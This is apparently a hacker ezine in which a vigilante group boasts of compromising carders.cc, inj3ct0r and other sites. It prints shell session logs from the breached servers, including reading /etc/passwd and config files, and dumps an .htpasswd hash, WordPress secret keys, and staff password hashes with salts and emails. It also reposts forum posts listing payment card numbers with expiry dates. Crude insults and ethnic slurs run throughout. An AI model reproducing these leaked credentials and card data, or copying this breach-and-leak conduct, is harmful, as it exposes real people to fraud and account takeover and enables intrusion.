[EZINE] Owned and Exposed - ISSUE no 2 |\___/| -=[ISSUE - NO 2]=- =) ^Y^ (= -=[OF]=- \ ^ / )=*=( ______________________________ __ ____________ _ / \ |.-----.--.--.--.-----.-----.--| | ___ ___ _| || | | || _ | | | | | -__| _ | | . | | . || /| | | |\ ||_____|________|__|__|_____|_____| |__,|_|_|___|| \| | |_|/\ | | | ______ |__//_// ___/ __ | | | .-----.--.--.-----.| |.-----.--\_).--| || | | | | -__|_ _| _ || || ||__ --| -__| _ || | | | |_____|__.__| __|| || ||_____|_____|_____|| |_/ \__________________________|__|___| || |___________________| |______| ------------------------.++- / y- / y- ---------------------/ s/----------------------.++- / ys+-. |\ / y- ---------------\.../ /\ ys------/()/ / y- sy \/ /'''\ \| / s/- ------------------+-++s /-----' / s+-. ---------------------/s /-------------\.../ /\ ys -y s sy \/ /'''\ -----------------------y s---------------------++s /-----' ----------------------++' |\ /s / -------------------------------------/()/ -y ys \| -y s -------------------------------------------------++' |_______________ ,_._._._._._._._,_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _| carders.cc `\ |_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| inj3ct0r \ ~ Featuring ~ | ettercap \ _______________| |___________________\ /´ exploit-db | ! / backtrack |_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _,_._._._._._._._, / free-hack |_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| /___________________| ~ and ~ ! Out of the Blue into the Black ,_._._._._._._._|____________________________________________________ |_|_|_|_|_|_|_|_|___________________________________________________/ ~ INTRO ~ ! Greetings followers, welcome to the second issue of owned and exp0sed. This file is encoded with UTF-8, so to view it properly use unicode. For those who are reading and laughing with us: We (your happy ninjas) wish you a , _/^\_ < hax > /.-.\ * MERRY * `/&\` ,@.*;@, /_o.I %_\ (`'--:o(_@; /`;--.,__ `') ;@`o % O,*`'`&\ (`'--)_@ ;o %'()\ * NINJA * /`;--._`''--._O'@; /&*,()~o`;-.,_ `""`) /`,@ ;+& () o*`;-';\ (`""--.,_0 +% @' &()\ /-.,_ ``''--....-'`) /@%;o`:;'--,.__ __.'\ ;*,&(); @ % &^;~`"`o;@(); * HAXMAS * /(); o^~; & ().o@*&`;&%O\ `"="==""==,,,.,="=="==="` __.----.(\-''#####---...___...-----._ '` \)_`"""""` .--' `) o( )_-\ `"""` ` After our first release we got wind of some strange rumours. So just to be sure, we need to clarify some facts. So, who are we? First, lets talk about some things we are not. We are not an underground rival kiddy group. We are not a cyber mafia gang. We are the watchmen, the hackers who quietly observe the scene. If any skiddy community gets too big, we shut them down. If any lamer causes too much trouble, we shut them down. If any group keeps fucking stuff up, we stop them. So, why are we doing this? Some people say that being a vigilanty is wrong and that we are actually criminals. What can we say? This may be true. But the way we see it, if your not part of the solution, your part of the fucking problem. These idiots spread garbage across our scene and that is why they got owned. We take pride in what is left of the scene and we have serious problems with those who rape it. That's why we do what MUST be done. There are some things left we would like to say about carders.cc. First of all, they came back online after they got rm'ed. In the first issue we gave our word that we would make sure carders.cc would never come back. Well, we delivered on that promise in this issue. And as such carders.cc has once again been eliminated. Maybe this time they will get the hint. Also, Heise Security said that we were a rival group trying to capitalize on the demise of carders.cc. Apparently they weren't happy about our disclosure of the carders.cc database that included the personal information of carders.cc victims. What Heise forgot was that with this action, all the victims of carders.cc got the chance to realize that they were victims of fraud. You can try to say that our disclosure of the database put them at even greater risk of fraud but we disagree. What is more risky? Having your information secretly on an "underground" carding forum where it WILL be sold and used in frauduelent activity? Or, having it released so that you can be notified and take the appropriate action to mitigate the damage that has been done? I know which option I'd rather have. It is quite impressive how many people wrote about the Carders Hack without even bothering to read the zine. It is hilarious to see how the media works. Somebody writes an article, others copy information from it, others copy from it again. If we take a shit in a bowl. Then you eat that shit and puke it back into a different bowl for someone else to eat then they do the same thing, what do you have? "Two Journo's One Cup" is what you have. Fucking pathetic. On the other hand, we'd like to thank Brian Krebs. Even if some of his conclusions were way off the mark, he was still the first one to report about carders.cc and nearly every other article was based on Brian's work. At least you didn't eat shit and regurgitate it like the rest Brian, keep up the good work. Enough jibber jabber, let's get to business. You will soon realize that our targets vary: We owned ettercap because we were tired of people firing that shit up and pretending to be a l33th4x0r sheep who think they are the greatest hackerz with their ARP spoofing toolkitz.. If you have installed ettercap in the last 5 years you may want to check yo shit (;p). We owned offsec including backtrack and exploit-db because they are fucking security "expert" maggots (oops s/m/f/) who just fail so hard at security that we wonder why people really take their training courses. We imagine it's like open mic night at the laughatorium. We owned inj3ct0r because they are lameass wannabe milw0rm kids whose sole purpose in life is to disclose XSS 0dayz in Joomla (RSnake anyone?). We owned carders.cc (AGAIN) because they are unable to learn from their mistakes and keep spreading garbage around the underground. We owned free-hack because they are developing into one of the largest, most arrogant script-kiddie breeding grounds on the intertubez. ,_._._._._._._._|____________________________________________________ |_|_|_|_|_|_|_|_|___________________________________________________/ ~ carders.cc ~ ! Here we go again. We hope that everybody was looking forward to see carders.cc getting owned again. We kept our word, didn't we? Let us begin: ____________________________________________________________________ | __ __ | | .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | | | _ | | | _ || _| -__|| _ | _ |_ _| | | |__ |_____|_____||____|_____||_____|_____|__.__| | |________|__|________________________________________________________| | | | The ninja guys piss on you and your half trained monkeys or | | whatever your leet underground team consists of. If you continue, | | you will be owned over again and rm'd twice. Also we will punch | | you in the face. | |____________________________________________________________________| Our lazy ninja squad was too drunk to come over and punch you in the fucking face. So we'll just stick to owning you for now. Carders.cc went down for a few days, but came back as if nothing had happened. They switched some server admins and installed some new software in the hopes that they would be safe. They turned on some l33t "security" settings like PHP's "Safe Mode" and "Openbase Dir", and they also disabled lots of functions. All in all they thought they were pretty locked down. Well, obviously they were fucking wrong. It's hard to harden a system when everything is backdoored and unfortunately we are just too ninja to get stopped by your silly protections. You can never stop us. We will always keep owning and exp0sing you. No. Matter. What. You. Try. $ uname -a FreeBSD sec1560.2x4.ru 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009 root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 $ id uid=1000(carderscc) gid=1000(carderscc) groups=1000(carderscc) $ w 1:24AM up 11 days, 4:23, 0 users, load averages: 0.37, 0.48, 0.54 USER TTY FROM LOGIN@ IDLE WHAT $ alias ls="ls -la" $ ls total 47 drwxr-xr-x 17 root wheel 512 Jul 3 19:12 . drwxr-xr-x 17 root wheel 512 Jul 3 19:12 .. -rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc -rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile -r--r--r-- 1 root wheel 6206 Jan 18 2010 COPYRIGHT -rw-r--r-- 1 root wheel 0 Jul 3 19:12 a drwxr-xr-x 2 root wheel 1024 Jan 18 2010 bin drwxr-xr-x 7 root wheel 512 Jan 18 2010 boot dr-xr-xr-x 5 root wheel 512 Nov 24 21:14 dev drwxr-xr-x 22 root wheel 2560 Nov 1 23:54 etc drwxr-x--x 4 root wheel 512 Nov 1 23:54 home drwxr-xr-x 3 root wheel 1536 Jan 18 2010 lib drwxr-xr-x 2 root wheel 512 Apr 4 2010 libexec drwxr-xr-x 2 root wheel 512 Jan 18 2010 media drwxr-xr-x 2 root wheel 512 Jan 18 2010 mnt dr-xr-xr-x 1 root wheel 0 Dec 6 00:58 proc drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 root drwxr-xr-x 2 root wheel 2560 Jan 18 2010 sbin lrwxr-xr-x 1 root wheel 11 Jan 18 2010 sys -> usr/src/sys drwxrwxrwt 11 root wheel 512 Dec 5 23:42 tmp drwxr-xr-x 15 root wheel 512 Jan 18 2010 usr drwxr-xr-x 23 root wheel 512 Nov 24 21:14 var $ cat /etc/passwd # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin carderscc:*:1000:1000:User &:/home/carderscc:/sbin/nologin cardersblog:*:1001:1001:User &:/home/cardersblog:/usr/sbin/nologin $ cd /root $ ls total 412628 drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 . drwxr-xr-x 17 root wheel 512 Jul 3 19:12 .. -rw------- 1 root wheel 1856 Dec 5 23:53 .bash_history -rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc -rw------- 1 root wheel 2909 Dec 7 22:31 .history -rw-r--r-- 1 root wheel 155 Jan 18 2010 .k5login -rw------- 1 root wheel 61 Jul 5 21:44 .lesshst -rw-r--r-- 1 root wheel 303 Jan 18 2010 .login drwx------ 3 root wheel 512 Dec 6 02:34 .mc -rw------- 1 root wheel 641 Nov 8 20:33 .mysql_history -rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile drwx------ 2 root wheel 512 Nov 7 17:20 .ssh -rw-r--r-- 1 root wheel 417314245 Oct 24 21:13 24_10_2010_carderscc_01.sql drwxr-xr-x 3 root wheel 512 Jul 3 00:34 backup drwxr-xr-x 4 root wheel 512 Nov 8 17:58 backups drwxr-xr-x 2 root wheel 512 Jul 20 2009 crack -rw-r--r-- 1 root wheel 3223 Jul 20 2009 crack.zip -rw-r--r-- 1 root wheel 85 Aug 9 03:31 ddos.php -rw-r--r-- 1 root wheel 168 Feb 1 2010 example.php drwxr-xr-x 3 root wheel 512 Jul 5 00:41 greensql -rw-r--r-- 1 root wheel 20 Aug 9 03:26 info.php -rw------- 1 root wheel 16877 Jul 29 20:44 mbox drwxr-xr-x 3 root wheel 512 Jul 3 18:59 php drwxr-xr-x 14 carderscc carderscc 1536 Nov 2 16:15 proftpd-1.3.3c -rw-r--r-- 1 root wheel 4885847 Oct 29 17:27 proftpd-1.3.3c.tar.gz drwxr-xr-x 2 root wheel 512 Nov 8 18:50 stylebackup Mad PHP-Codez again! $ cat ddos.php $ cat info.php $ cat example.php $ cd /home/carderscc $ ls total 18 drwxr-x--- 7 carderscc www 512 Nov 18 20:45 . drwxr-x--x 4 root wheel 512 Nov 1 23:54 .. dr-xr-x--- 18 carderscc www 2560 Nov 12 23:32 carders.cc drwxrwxr-x 2 carderscc www 512 Dec 2 00:34 jabber.carders.cc drwxrwxr-x 11 carderscc www 3072 Nov 8 17:27 pma drwxrwxrwx 2 carderscc www 2048 Dec 6 00:40 temp drwxrwxr-x 5 carderscc www 512 Nov 6 19:47 vbseo $ cd carders.cc $ ls total 2286 dr-xr-x--- 18 carderscc www 2560 Nov 12 23:32 . drwxr-x--- 7 carderscc www 512 Nov 18 20:45 .. -r-xr-x--- 1 carderscc www 1107 Dec 5 15:34 .htaccess -r-xr-x--- 1 carderscc www 20 Nov 12 18:16 .htpasswd dr-xr-x--- 4 carderscc www 2048 Nov 18 21:17 admincp -r-xr-x--- 1 carderscc www 40115 Oct 29 20:53 ajax.php -r-xr-x--- 1 carderscc www 75525 Oct 29 20:53 album.php -r-xr-x--- 1 carderscc www 19041 Oct 29 20:52 announcement.php dr-xr-x--- 2 carderscc www 512 Oct 29 22:39 archive -r-xr-x--- 1 carderscc www 8668 Oct 29 20:52 asset.php -r-xr-x--- 1 carderscc www 20406 Oct 29 20:52 assetmanage.php -r-xr-x--- 1 carderscc www 15710 Oct 29 20:52 attachment.php -r-xr-x--- 1 carderscc www 6658 Oct 29 20:52 attachment_inlinemod.php -r-xr-x--- 1 carderscc www 3449 Oct 29 20:52 blog_attachment.php -r-xr-x--- 1 carderscc www 96043 Oct 29 20:53 calendar.php -r-xr-x--- 1 carderscc www 43 Oct 29 20:52 clear.gif dr-xr-x--- 9 carderscc www 3584 Nov 2 00:32 clientscript -r-xr-x--- 1 carderscc www 15270 Oct 29 20:52 converse.php dr-xr-x--- 7 carderscc www 512 Nov 2 00:33 cpstyles -r-xr-x--- 1 carderscc www 3231 Oct 29 20:52 cron.php -r-xr-x--- 1 carderscc www 5139 Oct 29 20:52 css.php dr-xr-x--- 3 carderscc www 512 Nov 2 00:33 customavatars dr-xr-x--- 3 carderscc www 512 Nov 2 00:33 customgroupicons dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 customprofilepics -r-xr-x--- 1 carderscc www 1707 Oct 29 20:52 editor.php -r-xr-x--- 1 carderscc www 46932 Oct 29 20:53 editpost.php -r-xr-x--- 1 carderscc www 1326 Oct 29 20:52 entry.php -r-xr-x--- 1 carderscc www 30006 Oct 29 20:53 external.php -r-xr-x--- 1 carderscc www 9888 Oct 29 20:52 faq.php -r-xr-x--- 1 carderscc www 5430 Jul 29 15:42 favicon.ico -r-xr-x--- 1 carderscc www 22568 Oct 29 20:53 forum.php -r-xr-x--- 1 carderscc www 42374 Oct 29 20:53 forumdisplay.php -r-xr-x--- 1 carderscc www 1988 Oct 29 20:52 global.php -r-xr-x--- 1 carderscc www 155760 Oct 29 20:54 group.php -r-xr-x--- 1 carderscc www 26072 Oct 29 20:53 group_inlinemod.php -r-xr-x--- 1 carderscc www 11470 Oct 29 20:53 groupsubscription.php -r-xr-x--- 1 carderscc www 8961 Oct 29 20:53 image.php dr-xr-x--- 28 carderscc www 1536 Nov 22 16:54 images dr-xr-x--- 9 carderscc www 6144 Nov 6 19:47 includes -r-xr-x--- 1 carderscc www 2318 Oct 29 20:53 index.php -r-xr-x--- 1 carderscc www 46943 Oct 29 20:53 infraction.php -r-xr-x--- 1 carderscc www 187725 Oct 29 20:54 inlinemod.php -r-xr-x--- 1 carderscc www 23934 Jul 29 21:10 invites.php -r-xr-x--- 1 carderscc www 6778 Aug 14 08:15 itrader.php -r-xr-x--- 1 carderscc www 14964 Aug 14 08:15 itrader_detail.php -r-xr-x--- 1 carderscc www 13515 Aug 14 08:15 itrader_feedback.php -r-xr-x--- 1 carderscc www 1405 Aug 14 08:15 itrader_global.php -r-xr-x--- 1 carderscc www 22171 Aug 14 08:15 itrader_main.php -r-xr-x--- 1 carderscc www 3970 Aug 14 08:15 itrader_report.php -r-xr-x--- 1 carderscc www 11362 Oct 29 20:53 joinrequests.php -r-xr-x--- 1 carderscc www 1643 Oct 29 20:53 list.php -r-xr-x--- 1 carderscc www 10869 Oct 29 20:53 login.php dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 madp -r-xr-x--- 1 carderscc www 30166 Oct 29 20:53 member.php -r-xr-x--- 1 carderscc www 16314 Oct 29 20:53 member_inlinemod.php -r-xr-x--- 1 carderscc www 40267 Oct 29 20:53 memberlist.php -r-xr-x--- 1 carderscc www 22186 Oct 29 20:53 misc.php dr-xr-x--- 2 carderscc www 512 Nov 6 19:48 modcp -r-xr-x--- 1 carderscc www 76749 Oct 29 20:53 moderation.php -r-xr-x--- 1 carderscc www 6701 Oct 29 20:53 moderator.php -r-xr-x--- 1 carderscc www 17474 Oct 29 20:53 newattachment.php -r-xr-x--- 1 carderscc www 41001 Oct 29 20:53 newreply.php -r-xr-x--- 1 carderscc www 20107 Oct 29 20:53 newthread.php -r-xr-x--- 1 carderscc www 21724 Oct 29 20:53 online.php dr-xr-x--- 5 carderscc www 512 Nov 2 00:33 packages -r-xr-x--- 1 carderscc www 8018 Oct 29 20:53 payment_gateway.php -r-xr-x--- 1 carderscc www 13282 Oct 29 20:53 payments.php -r-xr-x--- 1 carderscc www 3984 Oct 29 20:53 picture.php -r-xr-x--- 1 carderscc www 16587 Oct 29 20:53 picture_inlinemod.php -r-xr-x--- 1 carderscc www 26091 Oct 29 20:53 picturecomment.php -r-xr-x--- 1 carderscc www 29260 Oct 29 20:53 poll.php -r-xr-x--- 1 carderscc www 10336 Oct 29 20:53 posthistory.php -r-xr-x--- 1 carderscc www 76507 Oct 29 20:54 postings.php -r-xr-x--- 1 carderscc www 7009 Oct 29 20:53 printthread.php -r-xr-x--- 1 carderscc www 79357 Oct 29 20:54 private.php -r-xr-x--- 1 carderscc www 163617 Oct 29 20:55 profile.php -r-xr-x--- 1 carderscc www 56285 Oct 29 20:54 register.php -r-xr-x--- 1 carderscc www 7216 Oct 29 20:53 report.php -r-xr-x--- 1 carderscc www 14687 Oct 29 20:53 reputation.php -r-xr-x--- 1 carderscc www 34539 Oct 29 20:54 search.php -r-xr-x--- 1 carderscc www 22632 Oct 29 20:54 sendmessage.php -r-xr-x--- 1 carderscc www 12407 Oct 29 20:54 showgroups.php -r-xr-x--- 1 carderscc www 12660 Oct 29 20:54 showpost.php -r-xr-x--- 1 carderscc www 80037 Oct 29 20:54 showthread.php dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 signaturepics dr-xr-x--- 2 carderscc www 512 Nov 2 00:32 store_sitemap -r-xr-x--- 1 carderscc www 38784 Oct 29 20:54 subscription.php -r-xr-x--- 1 carderscc www 5321 Oct 29 20:54 tags.php -r-xr-x--- 1 carderscc www 8722 Oct 29 20:54 threadrate.php -r-xr-x--- 1 carderscc www 11068 Oct 29 20:54 threadtag.php -r-xr-x--- 1 carderscc www 61 Oct 29 20:52 uploadprogress.gif -r-xr-x--- 1 carderscc www 39639 Oct 29 20:54 usercp.php -r-xr-x--- 1 carderscc www 20956 Oct 29 20:54 usernote.php -r-xr-x--- 1 carderscc www 16518 Jul 29 16:35 vaispy.php dr-xr-x--- 13 carderscc www 1024 Nov 2 00:32 vb dr-xr-x--- 4 carderscc www 512 Nov 6 19:48 vbseo -r-xr-x--- 1 carderscc www 45239 Nov 6 19:48 vbseo.php -r-xr-x--- 1 carderscc www 4112 Nov 6 19:47 vbseocp.php -r-xr-x--- 1 carderscc www 27801 Oct 29 20:54 visitormessage.php -r-xr-x--- 1 carderscc www 1647 Oct 29 20:54 widget.php -r-xr-x--- 1 carderscc www 3769 Oct 29 20:54 xmlsitemap.php $ cat .htpasswd ddos:XScRLnTwdeJ6k $ cat includes/config.php usr/src/sys drwxrwxrwt 11 root wheel 512 Dec 5 23:42 tmp drwxr-xr-x 15 root wheel 512 Jan 18 2010 usr drwxr-xr-x 23 root wheel 512 Nov 24 21:14 var ?> $ cd /home/cardersblog $ ls total 8 drwxr-xr-x 4 cardersblog www 512 Nov 2 01:16 . drwxr-x--x 4 root wheel 512 Nov 1 23:54 .. dr-xr-x--- 5 cardersblog www 1024 Nov 21 00:18 blog.carders.cc drwxrwxrwx 2 cardersblog www 512 Nov 2 01:16 temp $ cd blog.carders.cc $ ls total 2928 dr-xr-x--- 5 cardersblog www 1024 Nov 21 00:18 . drwxr-xr-x 4 cardersblog www 512 Nov 2 01:16 .. -rw-r--r-- 1 cardersblog www 188 Nov 21 00:18 .htaccess -r-xr-x--- 1 cardersblog www 397 Aug 27 17:22 index.php -r-xr-x--- 1 cardersblog www 2683109 Jul 18 16:06 latest.tar.gz -r-xr-x--- 1 cardersblog www 15410 Aug 27 17:22 license.txt -r-xr-x--- 1 cardersblog www 9122 Aug 27 17:22 readme.html -r-xr-x--- 1 cardersblog www 4391 Aug 27 17:22 wp-activate.php dr-xr-x--- 7 cardersblog www 2560 Jul 18 16:06 wp-admin -r-xr-x--- 1 cardersblog www 40284 Aug 27 17:23 wp-app.php -r-xr-x--- 1 cardersblog www 220 Aug 27 17:23 wp-atom.php -r-xr-x--- 1 cardersblog www 274 Aug 27 17:23 wp-blog-header.php -r-xr-x--- 1 cardersblog www 3926 Aug 27 17:23 wp-comments-post.php -r-xr-x--- 1 cardersblog www 238 Aug 27 17:23 wp-commentsrss2.php -r-xr-x--- 1 cardersblog www 3173 Aug 27 17:23 wp-config-sample.php -r-xr-x--- 1 cardersblog www 3506 Jul 31 14:20 wp-config.php dr-xr-x--- 6 cardersblog www 512 Aug 27 18:05 wp-content -r-xr-x--- 1 cardersblog www 1255 Aug 27 17:23 wp-cron.php -r-xr-x--- 1 cardersblog www 240 Aug 27 17:23 wp-feed.php dr-xr-x--- 7 cardersblog www 2560 Jul 18 16:06 wp-includes -r-xr-x--- 1 cardersblog www 2002 Aug 27 17:23 wp-links-opml.php -r-xr-x--- 1 cardersblog www 2441 Aug 27 17:23 wp-load.php -r-xr-x--- 1 cardersblog www 26059 Aug 27 17:23 wp-login.php -r-xr-x--- 1 cardersblog www 7774 Aug 27 17:23 wp-mail.php -r-xr-x--- 1 cardersblog www 487 Aug 27 17:23 wp-pass.php -r-xr-x--- 1 cardersblog www 218 Aug 27 17:23 wp-rdf.php -r-xr-x--- 1 cardersblog www 316 Aug 27 17:23 wp-register.php -r-xr-x--- 1 cardersblog www 218 Aug 27 17:23 wp-rss.php -r-xr-x--- 1 cardersblog www 220 Aug 27 17:23 wp-rss2.php -r-xr-x--- 1 cardersblog www 9177 Aug 27 17:23 wp-settings.php -r-xr-x--- 1 cardersblog www 18695 Aug 27 17:23 wp-signup.php -r-xr-x--- 1 cardersblog www 3702 Aug 27 17:23 wp-trackback.php -r-xr-x--- 1 cardersblog www 94184 Aug 27 17:23 xmlrpc.php $ cat wp-config.php /?7m8/r0!,o}+e:eQfZo;7W:h7av[E:0V['); define('NONCE_KEY', '|R(!,}:(`utsK5kQ0$LoSd=e?X+C]bqBEp5WWbWLSb'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each a unique * prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * WordPress Localized Language, defaults to English. * * Change this to localize WordPress. A corresponding MO file for the chosen * language must be installed to wp-content/languages. For example, install * de.mo to wp-content/languages and set WPLANG to 'de' to enable German * language support. */ define ('WPLANG', ''); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. */ define('WP_DEBUG', false); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php'); ## | __________ | _ __ _ | | | /_\ / \ /_\ | | | put shit =|= | // | =|= | | | to shit ! \__/ ! | | | carders.cc _ | | | ___ | ___ //' | | | [___] | _ :=| |=: __T_||_T__ |p= | | | ~| | =)_)= | | [__________] | | | | | | (_( |xXx| \_ _/ | | | | | | )_) """"" \ / | | | \___| V | | | | | | `========, | | | | | ________`. .'_________________| |________|__________lc_| `. .' (____) \ _| |_... .;;;;;;;;. \ (________);;;; :;;;;;;;;;;: :::::::' '::::::::' HAPPY NINJA BATHROOM Team Member Passes: Vitali:28cf8ccb53f80f7e8fca5e781f2e6424:dusFzU/ZvUe;e@fx\\3>XIgN[yGx9[*:admin@carders.cc Juri:9475264713e83164de106d099350ff97:pqfgN4x7P)5_}0-E+PsIJ\\=_o1|oV&:daafagafd@dadadagfasg.dsxc Luigi:13ae8bfbd4fc44302fc6261f58dd583e:.u5//.-K4`u$lm00M3V}h:d397080@lhsdv.com Poseidon:0c18d81bcfa2845490f75e785f0e2457:BG$vA-%K_X<=|nF:tiberiusus@carders.in You guys dont get it, do you? We told you to fuck off and still you did not listen. We are not sorry for doing it again. You deserve it. ____________________________________________________|_._._._._._._._, \___________________________________________________|_|_|_|_|_|_|_|_| ! ~ inj3ct0r ~ #`````````` ___ ____ ____ #````______/```\__//```\__/____\ #``_/```\_/``:```````````//____\ #`/|``````:``:``..``````/````````\ W A R N I N G !!! DISCOVERED LAMER O_o #|`|`````::`````::``````\````````/ #|`|`````:|`````||`````\`\______/ #|`|`````||`````||``````|\``/``| #`\|`````||`````||``````|```/`|`\ 1) maybe you were wrong address, go Inj3ct0r.com #``|`````||`````||``````|``/`/_\`\ #``|`___`||`___`||``````|`/``/````\ #```\_-_/``\_-_/`|`____`|/__/``````\ #````````````````_\_--_/````\`````/ 2) Or you are not wrong address, then Fuck Off! #```````````````/____```````````/ #``````````````/`````\`````````/ #``````````````\______\_______/ Attention. This ridiculous banner is *not* part of our zine. In fact it is inj3ct0r's 404 page. We concluded that this banner perfectly reflects their retardedness. Their knowledge about security is on the same level as their ability to speak proper english. For those who don't know: inj3ct0r is a clone of the old milw0rm project, administered by some morons called "r0073r", "Sid3^effects" and "L0rd CrusAd3r". They are not only an exploit-db, but also an arrogant community of retarded turks and arabs which tell you how you to write your stupid Perl SQL-Injection exploit. All their attention whoring about how they hacked Facebook was driving us insane and all their moaning about how they have problems with the law was just too ridiculous for us to let them continue existing. Actually we did not find out what kind of law problems they actually had. We did however discover how stupid these kids are and what crap they are talking about in their private forum area's. Check it out: ------------- -0day 31337 privat Area -10-24-2010, 05:08 PM Post by KnocKout: - -0-Day Credit Cards | Part 2(Only 31337 Prv.)- - -Hi My Brothers.. - -14367 4454-5454-5454-5445 1 232 12-2012 -14375 5257-9555-0001-0933 1 082 03-2013 ADVANTAGE -14376 5492-9495-5876-7382 1 280 01-2013 BONUS -14391 5437-7122-6415-1343 1 334 07-2012 MAXЭMUM -14392 5437-7122-6415-1343 1 334 07-2012 MAXЭMUM -------------- - -0day 31337 privat Area -10-17-2010, 04:36 PM Post by KnocKout: - -Default => Rapid,Hotfile,CC Requests.. - -hi my brothers, -RapidShare, Hotfile Premium and Credit Card. Requests.. - -Please indicate your requests here, and I will send Pm.. -------------- Not only they are sharing CC's, they also think of themselves as the best hackerz on the planet. Here is how they talk about exploit-db and offsec: ------------- -0day 31337 privat Area: -07-19-2010, 10:05 PM Post by SeeMe: - -guys, a bind shell have been sent to offsec server and enforced the regarding ports to be open - -Port State Service Reason Product Version Extra info -22 tcp open ssh syn-ack OpenSSH 5.4 protocol 2.0 -80 tcp open http syn-ack Apache httpd 2.2.15 (Fedora) -301 tcp filtered unknown no-response -443 tcp open https syn-ack -1072 tcp filtered unknown no-response -1087 tcp filtered unknown no-response -1100 tcp filtered unknown no-response -1111 tcp filtered unknown no-response -1117 tcp filtered unknown no-response -1443 tcp filtered ies-lm no-response -1718 tcp filtered unknown no-response -1720 tcp filtered H.323/Q.931 no-response -1900 tcp filtered upnp no-response -2000 tcp filtered cisco-sccp no-response -2041 tcp filtered interbase no-response -2046 tcp filtered sdfunc no-response -2382 tcp filtered ms-olap3 no-response -3017 tcp filtered unknown no-response -4129 tcp filtered unknown no-response -4900 tcp filtered unknown no-response -5060 tcp filtered sip admin-prohibited -5555 tcp filtered freeciv no-response -5560 tcp filtered isqlplus no-response -6669 tcp filtered irc no-response -8007 tcp filtered ajp12 no-response -9102 tcp filtered jetdirect no-response -10000 tcp open snet-sensor-mgmt syn-ack -44443 tcp filtered coldfusion-auth no-response - -but I just can't connect back to it - -any idea! ------------- - -07-21-2010, 10:10 PM Post by SeeMe: - -This is a new technology for me how to gain credentials over HTTP TRACE and TRACK -when it's enable on a webserver - -The TRACE/TRACK method was enabled on the server listed below: - -http://www.offensive-security.com:80/ - -[PHP]http://www.offensive-security.com/wp-content/themes/infocus/lib/scripts/prettyPhoto/js/jquery.prettyPhoto.js?ver=./2.9.2%20HTTP/1.1[/PHP] - - -could gain view info from the link above ------------- - -07-30-2010, 12:26 AM Post by SeeMe: - -http://mobile.backtrack-linux.org/ - -exploited for good and not sure that will be able to back it up - -and I'm still heading for the main both sites, offsec.com and exploit-db - -After one month into the desert I'll be back infront of my computer on 15th of Agu - -and I'll prepare for a globel war ------------- They are calling exploit-db "lamers-db" yet they don't see who the real lamers are. Hardly surprising that the inj3ct0r team did not manage their box themselves and instead gave their work to some fat guy called "asker". But since he left his box rot with some half updated shit, it was a child's play to tap in and root. $ uname -a Linux wateam 2.6.26-2-686 #1 SMP Thu Sep 16 19:35:51 UTC 2010 i686 GNU/Linux $ id uid=0(root) gid=0(root) groups=0(root) $ cd / $ ls -la total 540 drwxr-xr-x 22 root root 1024 Oct 3 22:04 . drwxr-xr-x 22 root root 1024 Oct 3 22:04 .. drwxr-xr-x 2 root root 3072 Oct 3 21:09 bin drwxr-xr-x 4 root root 1024 Oct 3 21:10 boot drwxr-xr-x 15 root root 3460 Oct 15 15:19 dev drwxr-xr-x 68 root root 6144 Oct 20 17:44 etc drwxr-x--x 37 root root 4096 Oct 20 17:45 home drwxr-xr-x 2 root root 1024 Nov 3 2007 initrd lrwxrwxrwx 1 root root 28 Jul 29 11:28 initrd.img -> boot/initrd.img-2.6.26-2-686 lrwxrwxrwx 1 root root 28 Nov 24 2008 initrd.img.old -> boot/initrd.img-2.6.18-6-686 drwxr-xr-x 12 root root 7168 Oct 3 21:09 lib drwx------ 2 root root 12288 Nov 3 